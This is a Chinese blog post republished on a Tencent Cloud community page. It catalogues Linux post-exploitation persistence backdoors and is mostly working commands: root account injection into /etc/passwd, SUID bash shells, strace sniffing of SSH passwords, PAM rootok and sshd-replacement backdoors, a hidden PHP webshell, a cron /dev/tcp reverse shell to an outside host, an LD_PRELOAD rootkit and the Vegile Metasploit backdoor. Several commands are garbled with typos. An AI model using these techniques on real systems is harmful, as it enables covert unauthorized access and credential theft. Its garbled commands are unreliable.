前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >权限维持之Linux后门

权限维持之Linux后门

作者头像
安全小王子
发布2021-01-27 16:05:14
2K0
发布2021-01-27 16:05:14
举报
文章被收录于专栏:betasecbetasec

在渗透过程中拿到目标权限只是开始,通常会留下后门以便再次访问(简称APT)。因此需要进行权限维持,隐藏后门。本文将对Linux下常见的权限维持后门技术进行解析,知己知彼百战不殆。

1.添加root账户

原理:增加root密码为password的root用户

代码语言:javascript
复制
useradd -u -0 -o -g root -G root:password|chpasswd

上述命令可能会加不上,若加不上则两条命令分开执行

代码语言:javascript
复制
useradd -u 0 -o -g root -G root root echo root:root | chpasswd

如果一直失败

代码语言:javascript
复制
perl -e  'printcrypt("Poker","AA"). "\n"'密码为Poker
echo "backdoor:AALvujjdsfdsf:0:0:me:/root:/bin/bash">>/etc/passwd   #Aalv…为第一行命令执行结果

2.设置suid权限位

原理:设置了suid权限位的文件在执行时具有该文件拥有者的权限,故我们可以在root权限时留一个bash文件后门,使得在低权限时能够通过该后门获得root权限

代码语言:javascript
复制
cp /bin/bash  /tmp/test
chmod 4755 /tmp/test #或者chmod u+s /tmp/test
/tmp/test -p #因为在bash2中添加了防护措施,无法直接获取rootshell。使用-p参数获取

3.bash环境文件

原理:bash环境文件/etc/profile,~/.bash_profile,~/.bashrc,~/.bash_logout等,这些文件本质上是脚本文件,当用户登录系统后,会陆续执行其中的部分文件,在其中写入bash命令即可在用户登录时执行。(不通操作系统文件不同)

4.写入SSH公钥

原理:Linux主机打开了SSH时默认也开启了密钥登陆,故写入ssh公钥,即可留下一条控制系统的路

ssh-keygen -t rsa #生成ssh密钥对,公钥会带有当前主机的用户名和主机

5.strace记录认证信息

原理:strace用来跟踪一个进程执行时所产生的系统调用,或者说是用来监视系统调用的,它可以监视一个新进行的系统调用,也可以监视已经在运行系统调用,可以获得到参数、返回值、执行时间等,那么我们就可以利用他来监视sshd进程,获取用ssh登陆的账户密码。

代码语言:javascript
复制
pid ='ps -ef |grep
"sshd -D" grep -v grep| awk {'print $2'}'
strace -f -p $pid -o
/tmp/.sshOutput_"date+%Y%m%d%H%M%S".log -e trace=write -s 2048 &
#  该命令用来跟踪sshd进程,可以记录登录本机的ssh密码,坐等管理员ssh登录,查看日志文件,在日志中搜索

grep -n "write(4,\"\\\\0\\\\0\\\\0\\\\"/tmp/.ssh.log)

代码语言:javascript
复制
alias ssh='strace -o /tmp/.sshOutput_"date+%Y%m%d%H%M%S".log -e trace=write -s 2048 ssh'   
#该命令为启用ssh登录程序是,跟踪该进程,可记录利用ssh登录背的主机密码在日志中直接搜索"password"字符串即可

6.SSH任意密码登录后门

原理:SSH登录默认使用PAM进行认证,而在root条件下,部分命令比如su,chfn等在执行时,无需使用密码,因为这些命令在PAM认证时使用了pam_rootok.so进行认证:pam_rootok.so:主要作用为使uid=0的账户在认证时直接通过PAM在认证时,以命名名字在/etc/pam.d/目录下查找,PAM配置文件。

部分配置文件中,对于认证采用了pam_rootook.so,并且使用了sufficient控制标记:

suth sufficient pam_rootok.so

则可以将sshd链接到使用rootok.so进行认证的命令上,并新开一个端口。

代码语言:javascript
复制
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=65534 #任意条命令就行
ln -sf /usr/sbin/sshd /tmp/chsh;/tmp/chsn -oPort=12345
ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=12345

直接使用ssh -p 65534 x.x.x.x登录,密码随意输入

7.SSH认证流程后门

原理:ssh登录时,系统处理登录请求的文件时usr/sbin/sshd,那么就可以修改该文件,在登录时执行特定操作。

代码语言:javascript
复制
cd /usr/sbin
mv sshd ../bin#将正常sshd文件移走,这里可以移到任何地方
echo '#!/usr/bin/perl' > sshd
echo 'exec "/bin/bash -i" if (getpeername(STDIN) =-/^..LF/);' >>sshd #当登录的源端口为19526时,直接返回一个shell
echo 'exec {"/usr/bin/sshd"}
"/usr/sbin/sshd",@ARGV,' >>sshd #若不是19526端口,则执行正常ssh登录流程,这里花括号里的路径是前面第二条命令的sshd路径
chmod u+x sshd
service sshd restart

socat STDIO TCP4:192.16.177.178:22.bind=:19526 #攻击机上执行,或者
socat STDTO TCP4:192.168.2.11:22,souccport=19526

8.Vim python2扩展后门

原理:vim安装时默认安装了当前服务器的python版本的扩展,如果是python2那么就会有python2的扩展,如果是python3,那么就会有python3的扩展,利用该扩展,可以用vim执行python脚本。

代码语言:javascript
复制
vim -version #查看python扩展版本
代码语言:javascript
复制
cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c"pyfile dir.py"> /dev/null 2>&1 &) && sleep 2&& rm -f dir.py         #victim主机上执行,其中dir.py可以是异常的py文件(此处dir.py为一个反弹shell的脚本)python3失效了

9.终端解析\r隐藏文本

原理:shell在解析\r时会忽略掉\r前的信息,故,使用该特点隐藏webshell代码

代码语言:javascript
复制
echo -e"<?-\`\$_POST[test]\`?>\r<?'PHP test page';?>">/var/www/html/test.php

10.计划任务

原理:写入计划任务,定期执行特定的命令。

使用crontab创建计划任务

代码语言:javascript
复制
echo -e "*/1 * * * * exec 9<>/dev/tcp/172.16.177.1/9888;exec 0<&9;exec 1>&9 2>&

1;/bin/bash --noprofile -i"|crontab - #该命令会修改/var/spool/cron/ 下对应用户的文件,如root用户执行该命令,则会修改目录下root文件,也相当于crontab -e

还有许多其它执行计划任务的文件及相关文件

11.预加载动态链接库

原理:系统执行一些命令的时候,在真正执行其文件之前,会加载相应的动态链接库,但linux提供了一个可以加载自定义动态链接库的方式,并且比加载正常动态链接库更早,故可以利用此特点设置自定义加载恶意动态链接库。

代码语言:javascript
复制
export LD_PRELOAD=/usr/lib/cub3.so.1       #http://github.com/mempodippy/cub3

取消命令:unset LD_PRELOAD

第二种:Vegile 后门

代码语言:javascript
复制
git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile
./vegile --u malware #malware为MSF的上线ELF文件

这个后门会生成多个恶意文件和进程

/usr/bin/screetsec

/usr/bin/debug

/usr/bin/tracker

/usr/bin/supervisited

/usr/bin/rma

这些恶意文件,此时MSF监听器会收到反弹连接,并且断开之后还会继续反弹,进程也无法杀死。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-01-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 betasec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档